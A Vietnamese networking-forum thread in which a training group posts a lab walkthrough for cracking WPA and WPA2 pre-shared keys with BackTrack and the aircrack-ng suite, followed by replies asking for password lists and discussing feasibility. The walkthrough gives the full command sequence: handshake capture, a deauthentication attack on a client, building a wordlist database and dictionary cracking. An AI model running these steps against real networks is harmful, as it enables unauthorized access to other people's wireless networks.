Xin chào ! Nếu đây là lần đầu tiên bạn đến với diễn đàn, xin vui lòng danh ra một phút bấm vào đây để đăng kí và tham gia thảo luận cùng VnPro.

Announcement

Collapse
No announcement yet.

LAB: Crack Khóa Wpa Trong Mạng Wlan

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • LAB: Crack Khóa Wpa Trong Mạng Wlan

    LAB: CRACK KHÓA WPA TRONG MẠNG WLAN
    Nhóm thực tập: GTVT
    THIẾT BỊ :
    vMột AP làm AP target
    vMột PC có card wireless làm client target.
    vMột PC có card wireless làm attacker
    vMột đĩa CD backtrack 3.0 beta

    YÊU CẦU:
    vĐể crack được wpa thì yêu cầu phải có môi trường cơ sở dữ liệu SQLite. Ta có thể download SQLite tại http://www.sqlite.org/sqlite-3.5.7.tar.gz .
    vMột list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack
    vMột list chứa các ssid, list này phải đảm bảo có chứa ssid của AP target.
    Bài lab này sẽ tiến hành crack các loại khoá là WPA PERSONAL TKIP, WPA PERSONAL AES, WPA2 AES và WPA2 TKIP+AES.

    CÁC BƯỚC TIẾN HÀNH CRACK:
    vCÀI ĐẶT SQLite như sau:
    tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
    cd sqlite-3.5.7
    ./configure --prefix=/usr/local
    Make

    CRACK WPA TKIP:
    ·Chuyển card wireless về monitor mode như hình sau:


    • Dò tìm kênh và MAC address của AP target và client target bằng lệnh airodump-ng ath0 , kết quả dò tìm như hình sau:



    • Tiến hành bắt gói trên kênh và MAC address của AP target vừa tìm được bằng lệnh:
    airodump-ng –c 1 –w/root/desktop/capture/wpa –bssid 00:14:bf:05: d6:0c ath0



    • Tiếp theo, ta dùng tool aireplay và MAC address của client target để tạo ra 4 bước bắt tay với AP target :
    Aireplay-ng -0 1 –a 00:14:bf:05: d6:0c –c 00:16:b6:99:74:78 ath0



    • Quay lại màn hình bắt gói airodump quan sát ta thấy quá trình bắt tay đã diễn ra như hình sau:



    Thế là ta đã capture được 4 bước bắt tay với AP target.
    • Dùng tool airolib-ng để tạo cơ sở dữ liệu cho quá trình crack bằng lệnh airolib-ng vnpro_gtvt_hcm init
    với vnpro_gtvt_hcm là tên của cơ sở dữ liệu được chứa mặc định trong home folder.
    Sau đó, ta import các list password và list ssid vào cơ sỡ dữ liệu vnpro_gtvt_hcm như sau:
    Airolib-ng vnpro_gtvt_hcm import ascii essid dictionary.txt
    /* với dictionary.txt là list chứa tên các ssid */



    Airolib-ng vnpro_gtvt_hcm import ascii passwd password.lst
    /* với password.lst là file chứa các password */



    • Ta kết hợp các ssid với password với nhau sau khi import thành công list password và list ssid bằng lệnh:
    Airolib-ng vnpro_gtvt_hcm batch
    kiểm tra lại số ssid và password hợp lệ mà ta có bằng lệnh sau:
    Airolib-ng vnpro_gtvt_hcm stats



    • mở một shell mới chạy tool aircrack-ng để tìm khoá :
    aircrack-ng –r vnpro_gtvt_hcm /root/desktop/capture/wpa*.cap



    Sau khi lệnh thực hiện xong, ta thu được key



    Quá trình crack khoá WPA AES, WPA2 AES và WPA2 TKIP+AES bao gồm các bước thực hiện hoàn toàn như việc crack WPA TKIP. Tiếp theo, ta chỉ kiểm tra quá trình tìm ra khoá của các loại khoá trên

    CRACK WAP AES



    Khoá tìm được :



    CRACK WPA2 AES





    CRACK WPA2 TKIP+AES


    Chạy lệnh tool aircrack để tìm key


    Tìm được key là vnprogtvthcmtkipvaaes (vnpro gtvt hcm tkip và aes)



    Chúc mọi người vui !!!
    Trần Mỹ Phúc
    tranmyphuc@hotmail.com
    Hãy add nick để có thông tin đề thi mới nhất :tranmyphuc (Hỗ trợ tối đa cho các bạn tự học)

    Cisco Certs : CCNP (Passed TSHOOT 1000/1000)

    Juniper Certs :
    JNCIP-ENT & JNCIP-SEC
    INSTRUCTORS (No Fee) : CISCO (Professional) , JUNIPER (Professional) , Microsoft ...

    [version 4.0] Ôn tập CCNA



  • #2
    Pro ơi thế cái list pass và ssid kia mình tự tạo ra với các pass mình nghĩ ra hay là thế nào vậy.
    Với lại các hình ở đây lỗi rùi ko đọc được

    Comment


    • #3
      Bạn ơi không nhìn thấy ảnh >"<!

      Comment


      • #4
        Chào !!!
        Hiện thì hình trang bài viết trên vẫn bình thường. Nếu vì lí do gì đó bạn không xem được, vui lòng xem file đính kèm

        Chúc bạn vui !!!
        Attached Files
        Trần Mỹ Phúc
        tranmyphuc@hotmail.com
        Hãy add nick để có thông tin đề thi mới nhất :tranmyphuc (Hỗ trợ tối đa cho các bạn tự học)

        Cisco Certs : CCNP (Passed TSHOOT 1000/1000)

        Juniper Certs :
        JNCIP-ENT & JNCIP-SEC
        INSTRUCTORS (No Fee) : CISCO (Professional) , JUNIPER (Professional) , Microsoft ...

        [version 4.0] Ôn tập CCNA


        Comment


        • #5
          Căng nhể, WPA mà cũng bị chộp và giải mã được khóa thì làm thế nèo bi giờ ?

          Comment


          • #6
            Phù, hóa ra cũng không căng lắm sau khi đọc hướng dẫn, SSID có thể bị dò ra được chứ khóa thì còn phải có thư viện, mới cả còn MAC Filter nữa chứ :)

            Comment


            • #7
              Originally posted by tranmyphuc1988 View Post
              [CENTER][CENTER][SIZE=5][COLOR=Red][B]Một list chứa các password, list này phải đảm bảo có chứa khoá của mạng mà ta cần hack.
              Cái này hơi bị khó, nhất là ngừơi Việt Nam đặt password bị lung tung. Như vậy, việc dò theo tự điển chắc xác xuất thành công không cao rồi.
              Nhớ Network ........ !

              Comment


              • #8
                Pro ơi có cái list nào rùi thì share lên cho anh em với, thui chứ còn đi kiếm list pass với ssid khó waddi

                Comment


                • #9
                  Originally posted by tranmyphuc1988 View Post

                  CÁC BƯỚC TIẾN HÀNH CRACK:
                  vCÀI ĐẶT SQLite như sau:
                  tar xvzf /root/Desktop/sqlite/sqlite-3.5.7.tar.gz
                  cd sqlite-3.5.7
                  ./configure --prefix=/usr/local
                  Make
                  bac chi cho em ki hon ve cach cai SQlite em ko ro~ Lam. Voi lai bac co file list chu pass va ssid thi share len cho anh em voi chu tui e ko bit tim cai nay o dau ca

                  Comment


                  • #10
                    Originally posted by hungdqk View Post
                    Pro ơi có cái list nào rùi thì share lên cho anh em với, thui chứ còn đi kiếm list pass với ssid khó waddi
                    Theo mình hiểu thì không có cách nào che dấu được SSID của AP đâu nên bạn có thể bỏ qua việc tìm từ điển của SSID.

                    Comment


                    • #11
                      nhưng mà còn cài cái sqlite ý em hông bít cái kiểu gì nữa

                      Comment


                      • #12
                        đọc cái này xong thì thấy còn hên xui quá, ko triệt để như crack WEP dc, CSDL pass ở đâu mà có sẵn, có đi chăng nữa cũng thấy ko khả thi mấy

                        Comment


                        • #14
                          Originally posted by sparrow View Post
                          Theo mình hiểu thì không có cách nào che dấu được SSID của AP đâu nên bạn có thể bỏ qua việc tìm từ điển của SSID.
                          Nếu ko broadcast SSID của AP thì vẫn giấu được :D
                          no car...no house...no money, but have only a sharing and friendly heart. What's the most important thing in this life "Heart or Money ?". Anything else can stead money ?

                          :32::53::X:106:

                          Nothing last forever...

                          Comment


                          • #15
                            hehe, thanks bác CMT :D
                            no car...no house...no money, but have only a sharing and friendly heart. What's the most important thing in this life "Heart or Money ?". Anything else can stead money ?

                            :32::53::X:106:

                            Nothing last forever...

                            Comment

                            Working...
                            X